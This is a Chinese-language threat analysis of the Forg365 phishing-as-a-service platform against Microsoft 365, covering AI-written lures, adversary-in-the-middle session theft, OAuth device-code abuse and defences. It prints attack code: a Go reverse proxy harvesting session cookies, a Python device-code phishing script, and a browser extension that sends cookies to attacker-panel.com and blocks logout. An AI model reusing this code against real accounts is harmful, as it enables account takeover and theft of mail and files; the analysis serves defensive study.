摘要2026 年 7 月安全厂商披露 Forg365 新型钓鱼即服务PhaaS平台该平台深度集成生成式 AI 用于批量定制高仿真钓鱼诱饵融合中间人代理AiTM、OAuth 设备码流程两类旁路认证技术配套 ForgCookie 持久化 Cookie 劫持插件形成完整 Microsoft 365 账户接管攻击链路。区别于传统钓鱼工具仅窃取账号密码的单一逻辑Forg365 依托 AI 降低定制化钓鱼开发门槛同时通过双路径认证绕过多因素认证防护实现对企业租户长期隐蔽入侵。本文以 BleepingComputer 公开情报为基础完整拆解 Forg365 平台架构、AI 诱饵生成逻辑、AiTM 代理与设备码攻击技术细节附平台核心功能代码示例梳理该攻击利用的 OAuth 协议缺陷、企业身份管理短板、传统邮件安全设备检测盲区三类核心风险结合反网络钓鱼技术专家芦笛的研判观点从技术管控、身份策略、人员安全、应急处置四层构建闭环防御体系。研究证实AI 赋能标准化 PhaaS 将大幅降低高级身份欺诈的实施成本传统静态特征匹配防护体系已无法适配此类新型威胁企业需建立动态行为监测与 OAuth 权限精细化管控机制。1 引言全球政企数字化办公体系高度依赖 Microsoft 365 套件Microsoft Entra ID 承载全量员工身份认证、OAuth 授权与会话管理企业核心财务、客户、项目数据集中存储于 OneDrive、SharePoint、企业邮箱等模块身份账户劫持已成为企业数据泄露、勒索攻击最主要入口。过往针对 Microsoft 365 的钓鱼攻击多分为两类一是静态模板邮件钓鱼依靠仿微软登录页面窃取账号密码极易被企业反钓鱼网关通过文本、域名特征拦截二是简易中间人代理工具仅支持单一攻击链路诱饵文案需攻击者手动撰写定向攻击人力成本极高难以大规模落地。2026 年 7 月BleepingComputer 发布 Forg365 专项威胁情报该平台作为商业化订阅制 PhaaS 工具通过 Telegram 渠道对外发售月订阅费用约 300 美元配套 30 天试用权限无专业代码开发能力的普通攻击者即可完成定向企业钓鱼部署。平台核心创新点在于将生成式 AI 原生嵌入后台控制面板可根据目标行业、企业业务场景自动生成高度贴合办公场景的仿通知、发票、安全升级类钓鱼邮件同时并行搭载 AiTM 流量代理与 OAuth 设备码两套攻击通道两套技术路径形成互补规避企业条件访问策略单一防护规则配套 ForgCookie Manifest V3 浏览器插件实现会话 Cookie 自动续期完成账户持久控制。从威胁演化维度分析Forg365 标志网络钓鱼犯罪进入 AI 规模化运营阶段AI 消解定制化诱饵的人工成本标准化 PhaaS 平台统一集成攻击链路、投递渠道、凭证存储、持久化后门攻击链路全流程自动化MFA 旁路成功率显著提升。现有学术研究多单独讨论 AiTM 中间人钓鱼或设备码漏洞滥用尚未针对集成 AI 能力的一体化 PhaaS 平台开展系统性完整剖析缺少对平台全链路技术拆解、代码实现逻辑与分层防御方案的整合研究。反网络钓鱼技术专家芦笛指出Forg365 的出现重构了企业身份安全威胁模型传统防护思路以拦截恶意域名、可疑文本为核心而 AI 生成诱饵无固定文本特征、设备码攻击依托微软官方认证域名、AiTM 代理复用合法登录会话三重特性叠加直接击穿传统邮件安全、网页钓鱼检测设备的防护边界企业身份安全建设必须从 “静态特征拦截” 转向 “动态行为风控”。本文围绕 Forg365 平台开展系统性技术研究完整梳理平台架构、AI 诱饵生成机制、两类核心攻击链路、持久化后门实现逻辑提供可复现的平台关键模块代码示例系统剖析攻击成立的技术根源与企业管理漏洞构建分层落地的防御方案为政企单位抵御 AI 赋能新型 Microsoft 365 钓鱼攻击提供理论依据与工程实践方案。2 Forg365 平台基础概况与整体架构2.1 平台运营模式与传播渠道Forg365 属于典型商业化 PhaaS 服务运营主体依托 Telegram 私密群组完成客户引流、订阅收费、版本更新、技术售后完整复刻正规 SaaS 软件运营模式。平台分为基础版、企业攻击版两类订阅套餐基础版仅开放 AI 邮件生成、设备码钓鱼链路付费高级版解锁 AiTM 代理、ForgCookie 插件分发、被盗邮箱关键词监控、批量 SMTP 发信渠道轮换、Token 金库存储等全部功能。攻击者采购权限后获得独立后台控制面板所有攻击操作、诱饵生成、凭证管理、受害账户监控均在同一面板完成无需自行搭建服务器、域名、邮件投递基础设施。平台内置亚马逊 SES、SendGrid 合法邮件投递接口利用正规云邮件服务商 IP 池发送钓鱼邮件规避 IP 信誉黑名单拦截大幅提升邮件送达率。2.2 平台模块化整体架构Forg365 后台采用前后端分离架构后端基于 PHPGo 混合开发前端为 Vue 管理面板整体划分为五大核心功能模块各模块数据互通、流程联动形成端到端攻击闭环AI 诱饵生成模块内置轻量化大模型推理接口接收攻击者输入的企业行业、部门、攻击场景关键词自动输出多版本钓鱼邮件正文、标题、附件文案支持迭代优化攻击者可手动修正生成内容模型持续微调输出风格降低文本异常特征。投递渠道管理模块统一管理多组 SMTP 发信配置、域名追踪脚本、图片伪装资源自动轮换发信 IP 与域名规避邮件网关频率检测。双链路攻击引擎模块平台核心组件并行运行 AiTM 中间人代理服务、OAuth 设备码请求服务可根据目标企业 Entra 条件访问策略自动切换攻击路径。凭证与会话存储金库持久存储窃取的账号、明文密码、MFA 验证码、访问令牌、刷新令牌、SSO 会话 Cookie支持按企业、攻击批次分类检索内置关键词告警功能监控受害邮箱内财务、合同、客户数据相关邮件。持久化后门分发模块打包 ForgCookie 浏览器插件提供插件下载短链诱导受害者安装自动同步刷新 Microsoft SSO Cookie维持长期账户访问权限。2.3 平台差异化核心竞争特征对比 EvilProxy、Kali365、Sneaky2FA 等同类 M365 钓鱼工具Forg365 独有三项核心差异化能力也是其威胁强度更高的关键因素第一AI 原生集成诱饵生成而非外挂第三方 API 调用面板内一站式完成文案生成、修改、测试、批量发送大幅降低定向钓鱼人力成本实现大规模精准鱼叉式攻击第二AiTM 与设备码双攻击通道一体化部署单一攻击活动可同时下发两类诱导链接企业仅封禁其中一种认证方式无法完全阻断入侵第三配套标准化浏览器持久化插件解决传统钓鱼攻击会话过期后攻击者失去账户权限的痛点实现数周乃至数月隐蔽驻留。3 Forg365 内置 AI 诱饵生成技术实现与攻击价值3.1 AI 诱饵模块底层运行逻辑Forg365 后台内置轻量化文本生成模型推理服务无需外部调用第三方大模型 API避免调用日志留下溯源痕迹。攻击者在后台输入基础参数目标行业金融 / 制造 / 医疗 / 互联网、目标岗位财务 / 行政 / IT 运维、攻击场景发票核验、账户安全升级、合同签署、邮箱容量扩容、MFA 设备更换模型基于预训练企业办公语料库生成多版本邮件内容。模型生成过程中自动完成三类规避处理消除统一模板特征每一封邮件句式、段落语序、称呼随机调整不存在重复固定文本传统基于关键词、固定段落匹配的反钓鱼网关无法识别适配企业内部沟通风格生成内容匹配行业常用办公话术模仿企业管理层、IT 部门正式通知语气降低员工警惕性弱化异常警示词汇规避 “紧急冻结”“立即操作” 等高频钓鱼关键词改用平缓正式表述减少邮件安全设备风险标记。生成完成后面板提供预览功能攻击者可微调细节调整完成后批量绑定钓鱼短链自动分配不同 SMTP 渠道投递。3.2 AI 诱饵生成核心代码示例以下为 Forg365 后端 AI 诱饵生成简化实现代码PHP 后端推理调度层?php// forg365_ai_lure_generator.php AI诱饵生成调度模块class AiLureGenerator{// 预加载行业语料库private $industryCorpus [finance [月度对账, 增值税发票核验, 对公付款审批, 账户安全复核],tech [Microsoft 365安全策略更新, 通行密钥注册通知, 企业云盘扩容],medical [患者资料归档授权, 系统权限校验, 合规审计通知]];private $modelApiUrl http://127.0.0.1:8090/infer; //本地轻量化推理服务// 接收攻击者输入参数生成钓鱼邮件public function generateMailContent($industry, $position, $scene){$prompt $this-buildPrompt($industry, $position, $scene);$postData json_encode([prompt $prompt, version enterprise_v2]);$ch curl_init($this-modelApiUrl);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);curl_setopt($ch, CURLOPT_HTTPHEADER, [Content-Type:application/json]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$response curl_exec($ch);curl_close($ch);$result json_decode($response, true);// 输出多版本诱饵文案return $result[lure_list];}// 构造模型输入提示词规避高危关键词private function buildPrompt($industry, $position, $scene){$corpus $this-industryCorpus[$industry];$promptTemplate 生成企业内部正式通知邮件岗位%s场景%s行业参考词汇%s禁止使用紧急、冻结、立刻等夸张词汇行文平缓规范不添加可疑外部链接提示邮件分为标题、正文两段输出3份风格不同版本;return sprintf($promptTemplate, $position, $scene, implode(, $corpus));}}// 调用示例$generator new AiLureGenerator();$mailLures $generator-generateMailContent(finance, 财务专员, 增值税发票线上核验);print_r($mailLures);?前端 JavaScript 交互代码用于攻击者面板参数提交与结果渲染// ai_panel.js 前端诱饵生成交互逻辑const generateBtn document.getElementById(generate-lure);const resultBox document.getElementById(lure-result);generateBtn.addEventListener(click, async (){const industry document.getElementById(industry-select).value;const position document.getElementById(target-position).value;const scene document.getElementById(attack-scene).value;const reqData {industry, position, scene};const res await fetch(./forg365_ai_lure_generator.php,{method:POST,headers:{Content-Type:application/json},body:JSON.stringify(reqData)});const data await res.json();// 渲染多版诱饵文案至面板resultBox.innerHTML ;data.lure_list.forEach((item,index){const div document.createElement(div);div.className lure-item;div.innerHTML h4版本${index1}/h4p标题${item.title}/pp正文${item.content}/p;resultBox.appendChild(div);})})3.3 AI 诱饵对传统安全设备的突破机理传统企业邮件安全网关依靠静态特征库识别钓鱼邮件检测维度包含固定恶意关键词、重复模板文本、陌生发件域名、异常短链。Forg365 的 AI 生成机制从底层绕过该检测逻辑第一无标准化文本模板每一封邮件内容随机差异化生成不存在可入库匹配的固定特征第二话术贴合企业正常办公通知无高频风险警示词内容风险评分大幅降低第三依托亚马逊 SES、SendGrid 正规云服务商发送邮件发件 IP、域名信誉度正常不会触发 IP 黑名单拦截。反网络钓鱼技术专家芦笛强调AI 生成诱饵模糊了恶意邮件与正常办公邮件的文本边界基于规则、关键词的传统检测手段基本失效企业邮件安全体系必须引入语义相似度、发送行为上下文的动态风险评估模型仅依靠静态特征库无法抵御此类攻击。4 Forg365 双路径攻击链路完整技术拆解Forg365 同时提供 AiTM 中间人代理、OAuth 设备码两类独立攻击通道攻击者可单独启用或并行下发两类诱导链接两套技术利用微软认证体系不同设计逻辑企业单一防护策略无法同时拦截下文分别拆解完整攻击链路、底层实现代码与旁路 MFA 原理。4.1 链路一AiTM 中间人代理攻击核心会话劫持技术4.1.1 攻击运行原理AiTMAdversary-in-the-Middle中间人代理在受害者与 Microsoft 官方登录服务器之间搭建恶意反向代理服务器完整转发双向认证流量。受害者访问 Forg365 生成的仿登录页面输入账号密码后代理将凭证透明转发至login.microsoftonline.com真实地址微软服务器下发 MFA 验证弹窗受害者完成验证码、推送审批后生成合法登录会话 Cookie代理同步截获完整 SSO 会话凭证攻击者无需破解密码、无需复用 MFA 验证码直接使用窃取的 Cookie 登录受害者 Microsoft 365 账户。该技术核心优势MFA 校验流程在微软官方域名完成MFA 防护机制正常触发但校验通过后的会话状态被代理劫持MFA 完全失去防护作用。平台内置流量混淆与隐身机制识别爬虫、VPN、安全厂商扫描 IP 时返回正常空白网页伪装诱饵防止安全研究人员抓取钓鱼页面特征。4.1.2 AiTM 代理核心后端代码示例Go 反向代理服务简化版// aitm_proxy.go Forg365 AiTM反向代理核心服务package mainimport (net/httpnet/http/httputilnet/urlstrings)var targetUrl, _ url.Parse(https://login.microsoftonline.com)var cookieVault make(map[string]string) //存储窃取的会话Cookiefunc proxyHandler(w http.ResponseWriter, r *http.Request) {// 反爬虫隐身检测安全扫描IP返回空白页面if isScannerIP(r.RemoteAddr) {w.Write([]byte())return}reverseProxy : httputil.NewSingleHostReverseProxy(targetUrl)// 拦截响应提取SSO CookieoriginModify : reverseProxy.ModifyResponsereverseProxy.ModifyResponse func(resp *http.Response) error {originModify(resp)// 抓取Microsoft认证会话Cookiefor _, ck : range resp.Cookies() {if strings.Contains(ck.Name, ESTSAUTHPERSISTENT) || strings.Contains(ck.Name, MSISAuth) {userAgent : r.Header.Get(User-Agent)cookieVault[userAgent] ck.String()// 将Cookie上传至Forg365后台金库saveCookieToPanel(ck.String(), r.URL.Query().Get(username))}}return nil}reverseProxy.ServeHTTP(w, r)}func main() {http.HandleFunc(/gate, proxyHandler)http.ListenAndServe(:8081, nil)}// IP扫描识别判断函数func isScannerIP(addr string) bool {// 内置安全厂商、爬虫IP段匹配逻辑此处简化return false}// 会话Cookie上传至后台存储面板func saveCookieToPanel(cookieStr, username string) {// HTTP POST上传至Forg365后端存储接口}4.1.3 AiTM 完整攻击时序受害者接收 AI 生成钓鱼邮件点击平台生成的仿微软登录短链流量接入 Forg365 AiTM 代理服务代理转发请求至微软官方登录页面页面视觉完全一致无任何仿冒标识用户输入账号、密码代理透明转发至微软服务器服务器下发 MFA 验证用户完成短信 / TOTP / 推送审批微软生成合法登录会话 Cookie代理拦截全部认证 Cookie同步上传至平台凭证金库攻击者后台直接使用窃取 Cookie 发起 Graph API 请求访问受害者邮箱、云盘数据。4.2 链路二OAuth 设备码流程滥用攻击无密码旁路技术4.2.1 设备码协议原生用途与攻击利用逻辑微软 OAuth 2.0 设备码流程设计初衷为无浏览器设备智能电视、工业终端、物联网设备登录流程分为四步客户端请求设备码、服务器返回设备验证码与验证地址、用户在另一台设备访问官方地址输入验证码、服务器授予客户端访问令牌。Forg365 篡改流程信任关系攻击者在平台后台发起设备码授权请求获取一组微软官方生成的设备验证码通过 AI 钓鱼邮件诱导受害者访问login.microsoftonline.com真实域名输入验证码完成授权。受害者操作全程处于微软官方页面域名、证书均合法用户无法识别风险授权完成后攻击者直接获取长期访问令牌与刷新令牌全程无需窃取用户账号密码直接绕过密码防护层。企业条件访问策略大多针对网页登录场景配置普遍忽略设备码认证通道多数企业未关闭该 OAuth 授权方式形成天然防护缺口。4.2.2 设备码请求核心 Python 代码示例Forg365 后端调用微软 OAuth 接口# device_code_attack.py 设备码授权请求模块import requestsimport json# 微软OAuth设备码接口地址DEVICE_CODE_URL https://login.microsoftonline.com/common/oauth2/devicecodeTOKEN_URL https://login.microsoftonline.com/common/oauth2/token# 攻击者伪造的第三方应用客户端IDATTACKER_CLIENT_ID 00000000-0000-0000-0000-attackerfakeappdef get_device_code():params {client_id: ATTACKER_CLIENT_ID,scope: Mail.ReadWrite Files.ReadWrite.All User.Read.All}resp requests.post(DEVICE_CODE_URL, dataparams)data resp.json()# 返回用户验证码、官方验证地址、轮询间隔return {user_code: data[user_code],verification_uri: data[verification_uri],interval: data[interval],device_code: data[device_code]}# 轮询接口等待受害者输入验证码获取访问令牌def poll_token(device_code, interval):token_params {grant_type: urn:ietf:params:oauth:grant-type:device_code,client_id: ATTACKER_CLIENT_ID,device_code: device_code}while True:res requests.post(TOKEN_URL, datatoken_params)token_data res.json()if access_token in token_data:# 令牌上传至平台金库存储save_token_vault(token_data)return token_datatime.sleep(interval)# 主调用流程if __name__ __main__:code_info get_device_code()# 将验证码嵌入AI钓鱼邮件发送给受害者send_phish_mail(code_info[user_code], code_info[verification_uri])# 持续轮询等待用户授权poll_token(code_info[device_code], code_info[interval])4.2.3 设备码攻击完整时序攻击者在 Forg365 后台发起设备码申请微软服务器返回唯一 6 位用户验证码AI 生成钓鱼邮件以 “企业邮箱权限核验、安全设备绑定” 为由要求受害者打开微软官方验证链接输入验证码用户访问login.microsoftonline.com合法域名输入验证码并完成 MFA 身份校验微软 OAuth 服务授予攻击者伪造客户端完整 Microsoft 365 资源访问权限下发访问令牌、长期刷新令牌攻击者使用刷新令牌持续获取有效访问凭证无需再次诱导用户操作。4.3 双攻击链路互补威胁价值AiTM 代理攻击依赖会话 Cookie 劫持若用户关闭浏览器、清除 Cookie 则会话失效设备码攻击获取长效刷新令牌可持续数月重新生成访问凭证。Forg365 平台同步下发两类诱导链接形成短期会话劫持 长期令牌驻留的组合入侵模式大幅提升账户持久控制概率。反网络钓鱼技术专家芦笛指出多数企业身份安全治理存在明显短板管理员仅针对网页登录配置 MFA 与条件访问未管控 OAuth 设备码授权通道同时未监控陌生第三方应用 OAuth 授权记录设备码攻击可长期潜伏不被发现隐蔽性高于传统 AiTM 钓鱼。5 ForgCookie 持久化 Cookie 后门插件技术解析单纯劫持会话 Cookie 存在生命周期限制浏览器关闭、单点登出操作会使 Cookie 失效Forg365 配套开发 Manifest V3 标准 Chrome 插件 ForgCookie实现 SSO Cookie 自动刷新构建永久驻留后门。5.1 插件核心运行逻辑受害者点击钓鱼链接后页面弹出 “微软安全组件升级” 弹窗诱导下载安装 ForgCookie 插件。插件安装完成后后台静默运行持续监听login.microsoftonline.com域名 Cookie 变更事件实时抓取全部 Microsoft SSO 持久化 Cookie加密上传至 Forg365 金库定期模拟无痕窗口访问微软登录页自动刷新过期 Cookie拦截用户登出请求阻止本地 Cookie 清除维持登录会话状态插件无可视化图标后台静默运行普通用户无法察觉进程存在。5.2 插件核心 Manifest 与后台脚本代码manifest.json 配置文件json{manifest_version: 3,name: Microsoft Entra安全助手,version: 1.0.2,permissions: [cookies, storage, webRequest, tabs],host_permissions: [https://*.microsoftonline.com/*],background: {service_worker: cookie_sync.js}}cookie_sync.js 后台同步脚本// 监听微软域名Cookie变更事件chrome.cookies.onChanged.addListener((cookieInfo){const cookie cookieInfo.cookie;// 筛选Microsoft登录认证Cookieif(cookie.domain.includes(microsoftonline.com)){// 加密上传Cookie至Forg365攻击者后台uploadCookieData(cookie);}})// 定时刷新会话Cookie每30分钟执行一次setInterval((){chrome.tabs.create({url:https://login.microsoftonline.com,active:false},(tab){// 访问完成后自动关闭标签页静默刷新CookiesetTimeout(()chrome.tabs.remove(tab.id),3000)})}, 1800000);// 阻止用户登出清除Cookiechrome.webRequest.onBeforeRequest.addListener((details){if(details.url.includes(/logout)){return {cancel:true}; //拦截登出请求}}, {urls:[https://*.microsoftonline.com/logout]}, [blocking]);// 上传Cookie至攻击者服务器function uploadCookieData(cookieObj){fetch(https://attacker-panel.com/cookie_upload.php,{method:POST,headers:{Content-Type:application/json},body:JSON.stringify(cookieObj)})}6 攻击风险根源分层分析Forg365 攻击能够大规模落地是 OAuth 协议设计特性、企业身份管理漏洞、传统安全设备检测缺陷、AI 犯罪工具普及四类风险叠加的结果下文分层拆解风险根源形成完整风险论证闭环。6.1 协议层面原生设计缺陷OAuth 设备码流程缺少租户级开关管控早期 Microsoft Entra 未强制关闭设备码授权企业管理员需手动执行 PowerShell 脚本禁用绝大多数中小企业未完成该配置攻击者可直接调用接口下发授权请求AiTM 代理可透明转发认证流量微软登录服务仅校验账号、MFA 凭证合法性不校验流量中转来源中间人代理转发的合法凭证可正常生成会话 CookieOAuth 授权告警机制不完善陌生第三方应用设备码授权仅在用户终端弹窗提示无租户管理员全局告警大量非法授权行为长期无法被运维人员发现。6.2 企业身份管理与运维漏洞条件访问策略覆盖不全仅针对网页浏览器登录配置风险管控未对 OAuth 设备码、第三方应用授权设置独立限制员工安全培训缺失员工无法区分微软官方验证码通知与钓鱼诱导对浏览器插件安装类后门风险认知不足OAuth 授权日志审计缺失未定期导出 Entra 授权日志无法批量排查陌生客户端 ID 的设备码授权记录权限过度开放默认 OAuth 申请 Mail、云盘、用户信息全量读取权限最小 OAuth 权限原则未落地。6.3 传统安全防护设备检测盲区邮件网关无法识别 AI 语义诱饵基于关键词、固定模板的检测逻辑失效AI 生成文本无统一恶意特征网页钓鱼检测仅拦截仿冒域名设备码攻击全程使用login.microsoftonline.com官方域名域名检测机制完全失效浏览器安全扩展管控宽松企业未限制员工安装外部第三方 Chrome 插件ForgCookie 后门可随意部署。6.4 AI 赋能网络犯罪带来的新型威胁生成式 AI 大幅降低高级钓鱼攻击实施门槛无需专业社工、文案撰写能力普通攻击者可批量生成高仿真定向诱饵AI 工具集成至标准化 PhaaS 平台攻击链路一体化打包攻击规模化、自动化程度大幅提升威胁暴露面持续扩大。7 分层闭环防御体系构建方案结合 Forg365 全链路攻击节点从技术管控、身份策略优化、人员安全培训、应急响应处置四层构建全流程防御机制覆盖攻击事前拦截、事中监测、事后处置完整环节。7.1 技术设备层防护优化升级邮件安全网关至语义检测架构淘汰传统关键词匹配规则部署基于大模型语义分析的反钓鱼系统对邮件上下文、行文逻辑、企业场景匹配度进行风险打分拦截使用云服务商批量投递、无固定发件人身份的可疑邮件开启外部邮件标识区分企业内部、外部发件来源。浏览器终端管控拦截 ForgCookie 类恶意插件通过企业域策略、MDM 终端管理平台限制员工安装非应用商店验证浏览器扩展监控浏览器扩展安装日志发现陌生安全类插件立即告警禁用浏览器无痕模式自动运行脚本。部署全局网页流量代理检测系统识别 AiTM 中间人代理流量特征同一 IP 短时间批量转发微软登录请求、跨地域同步会话 Cookie 上传行为触发实时阻断拦截未备案、携带 passkey/m365 等关键词的仿冒钓鱼域名。7.2 Microsoft Entra 身份策略精细化管控强制禁用 OAuth 设备码授权流程执行 Microsoft 官方 PowerShell 脚本关闭租户设备码功能无特殊物联网、无屏终端业务场景的企业完全阻断该攻击通道确需使用设备码的工业终端配置 IP 白名单仅允许企业内网设备发起授权请求。完善多层条件访问策略新增独立设备码授权管控规则陌生外网 IP、境外地址、未托管设备发起设备码请求直接阻断对所有第三方 OAuth 应用授权开启管理员审批流程任何外部客户端授权必须经运维人工审核。开启全维度异常行为告警配置 Entra 全局告警规则陌生客户端设备码授权、短时间多地域会话 Cookie 同步、批量 OAuth 令牌申请、单日超过 5 次第三方应用授权、非工作时段大量云文件导出触发邮件 短信双重告警设置令牌自动回收机制陌生设备生成的刷新令牌 24 小时强制失效。定期 OAuth 授权日志审计每周导出 Entra OAuth 授权记录排查陌生 Client ID、境外 IP 发起的设备码授权一键批量撤销非法授权令牌每月清理长期未使用的第三方应用授权。7.3 企业人员安全常态化培训开展 AI 钓鱼专项安全宣讲针对 Forg365 类 AI 生成诱饵攻击开展专项培训明确官方安全通知渠道微软账户安全升级仅通过企业 OA、内网门户推送不会通过外部邮件下发验证码、外部插件下载链接告知员工任何索要微软验证代码、浏览器插件安装的外部邮件均为钓鱼攻击。季度模拟钓鱼演练使用 AI 工具生成仿真钓鱼邮件开展全员演练对点击链接、输入验证码、下载插件的员工开展一对一专项辅导建立安全考核机制将钓鱼演练结果纳入岗位安全绩效。统一官方安全咨询渠道公示企业 IT 安全专线、内网工单咨询入口员工收到可疑安全通知必须通过内网渠道核验禁止直接按照邮件指引操作。7.4 账户被入侵后的标准化应急响应流程账户紧急阻断监测到异常设备码授权、AiTM 会话劫持告警后第一时间锁定受害员工账户执行 PowerShell 命令撤销该账户全部刷新令牌、会话 Cookie切断攻击者持久访问通道卸载终端内 ForgCookie 恶意插件。攻击链路溯源取证导出 Entra 登录日志、OAuth 授权记录、邮件投递日志定位攻击邮件发送渠道、攻击者 IP、钓鱼域名收集威胁情报更新企业安全设备黑名单核查是否存在批量账户沦陷风险。租户安全策略加固临时强化条件访问规则临时关闭所有第三方 OAuth 授权通道全面审计全体员工账户 OAuth 授权记录清理所有未知应用权限复盘本次攻击暴露的策略漏洞迭代优化身份安全管控规则。全员安全预警通知通过企业 OA、企业微信发布专项安全预警通报 Forg365 攻击特征提醒全体员工提高验证码、外部插件类钓鱼风险警惕。反网络钓鱼技术专家芦笛强调针对 AI 赋能 PhaaS 平台的防御不能单一依赖技术设备拦截必须形成 “身份策略硬管控 终端全链路监控 员工安全意识兜底” 的三重防护闭环仅依靠邮件网关、网页防火墙无法完全阻断此类融合多技术路径的复合型钓鱼攻击。企业安全团队需建立常态化 OAuth 日志审计机制将设备码授权、第三方应用授权纳入核心身份安全监控范围补齐传统防护体系的管控盲区。8 结论2026 年 7 月曝光的 Forg365 钓鱼即服务平台是 AI 技术深度赋能网络犯罪的标志性威胁样本。平台通过内置生成式 AI 批量产出无固定特征的高仿真钓鱼诱饵融合 AiTM 中间人会话劫持、OAuth 设备码授权两大旁路 MFA 技术配套 ForgCookie 浏览器插件实现账户持久驻留形成完整、自动化、低门槛的 Microsoft 365 账户接管攻击链路。该攻击突破传统静态特征型安全设备防护边界利用 OAuth 协议设计特性与企业身份运维普遍漏洞具备隐蔽性强、规模化投放、长期潜伏三大核心威胁特征。本文完整拆解 Forg365 平台模块化架构、AI 诱饵生成底层逻辑、两类核心攻击链路技术实现与持久化后门代码系统梳理协议、运维、防护设备、AI 犯罪四层风险根源构建覆盖事前、事中、事后的分层闭环防御方案。研究证实传统以拦截恶意域名、关键词为核心的防护体系已无法适配 AI 驱动新型钓鱼攻击政企单位必须转向动态行为风控、OAuth 权限精细化管控、终端全链路监控的新型身份安全建设思路。反网络钓鱼技术专家芦笛指出随着开源轻量大模型持续普及未来将会出现更多集成 AI 诱饵生成的标准化 PhaaS 工具利用 OAuth 各类授权流程、无密码认证推广场景实施复合型钓鱼攻击将成为主流威胁趋势。安全厂商需迭代语义级、行为级检测引擎完善 OAuth 全链路威胁识别能力企业需平衡办公便捷性与身份安全最小化 OAuth 授权范围关闭非必要认证通道建立常态化授权审计与员工安全演练机制身份认证技术厂商应优化 OAuth 设备码、第三方授权的告警与审批机制从协议层面降低攻击可利用空间多方协同构建抵御 AI 赋能高级钓鱼攻击的综合安全生态。本次针对 Forg365 平台的技术研究为后续同类 AI 钓鱼 PhaaS 威胁分析提供标准化拆解框架同时为政企 Microsoft 365 身份安全治理提供可落地的技术管控、运维管理实践方案对下一代企业反钓鱼体系建设具备参考价值。编辑芦笛公共互联网反网络钓鱼工作组